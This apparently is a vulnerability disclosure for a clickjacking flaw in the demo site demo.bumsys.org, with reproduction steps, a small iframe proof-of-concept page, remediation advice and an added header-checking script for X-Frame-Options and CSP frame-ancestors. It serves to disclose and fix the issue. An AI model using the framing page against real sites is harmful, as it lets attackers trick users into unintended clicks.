The web application does not restrict, or incorrectly restricts, frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.
1. Create a new HTML file (e.g. Test.html) with the content shown below.
2. Put `<iframe src="http://demo.bumsys.org/" width="1000" height="1000"></iframe>` in the file.
3. Save the file.
4. Open the file (Test.html) in a browser (e.g. Firefox).
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Clickjacking Attack</title>
</head>
<body>
<p>This Page is Vulnerable to Clickjacking</p>
<iframe src="http://demo.bumsys.org/" width="1000" height="1000"></iframe>
</body>
</html>
```
https://drive.google.com/file/d/12iuOMyGVS9qz5j3638PAVdYvhCipTfbi/view?usp=sharing
It is important to implement the X-Frame-Options header, use a Content Security Policy (CSP), and enable browser-side protections such as framebusting.
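To verify the fix, the response headers can be checked for an enforced anti-framing policy. The following is an added example, not part of the original report or the project's code: `frameAncestors` and `framingVerdict` are hypothetical helper names, the sample header sets are constructed, and one CSP policy per header value is assumed.

```javascript
// Added example (not part of the original report). Classifies a response's
// anti-framing headers; the header sets in `samples` are constructed.

// Return the frame-ancestors source list from a CSP value, or null if absent.
// Assumes a single policy per header value.
function frameAncestors(csp) {
  for (const directive of String(csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") return sources.map((s) => s.toLowerCase());
  }
  return null;
}

// headers: plain object of response headers (names are case-insensitive).
function framingVerdict(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // An enforced frame-ancestors directive takes precedence over X-Frame-Options.
  const fa = frameAncestors(h["content-security-policy"]);
  if (fa !== null) {
    if (fa.length === 0 || (fa.length === 1 && fa[0] === "'none'"))
      return { framable: false, reason: "frame-ancestors 'none'" };
    if (fa.some((s) => s === "*" || s === "http:" || s === "https:"))
      return { framable: true, reason: "frame-ancestors allows any origin" };
    return { framable: false, reason: "frame-ancestors limited to " + fa.join(" ") };
  }

  // De-duplicate comma-joined values (repeated headers are merged this way).
  const xfo = [...new Set((h["x-frame-options"] || "").split(",")
    .map((v) => v.trim().toUpperCase()).filter(Boolean))];
  if (xfo.length > 1) return { framable: null, reason: "conflicting X-Frame-Options values" };
  if (xfo[0] === "DENY" || xfo[0] === "SAMEORIGIN")
    return { framable: false, reason: "X-Frame-Options " + xfo[0] };
  if (xfo.length === 1) // ALLOW-FROM is obsolete; unknown values are ignored
    return { framable: true, reason: "X-Frame-Options value not honoured: " + xfo[0] };
  if (frameAncestors(h["content-security-policy-report-only"]) !== null)
    return { framable: true, reason: "frame-ancestors is report-only, not enforced" };
  return { framable: true, reason: "no anti-framing header" };
}

// Constructed sample responses.
const samples = [
  { "Content-Type": "text/html" },
  { "X-Frame-Options": "ALLOW-FROM https://partner.example" },
  { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'" },
];
for (const s of samples) console.log(JSON.stringify(s), "->", framingVerdict(s));
```

A `framable: null` verdict means the header combination needs manual review rather than an automatic pass or fail.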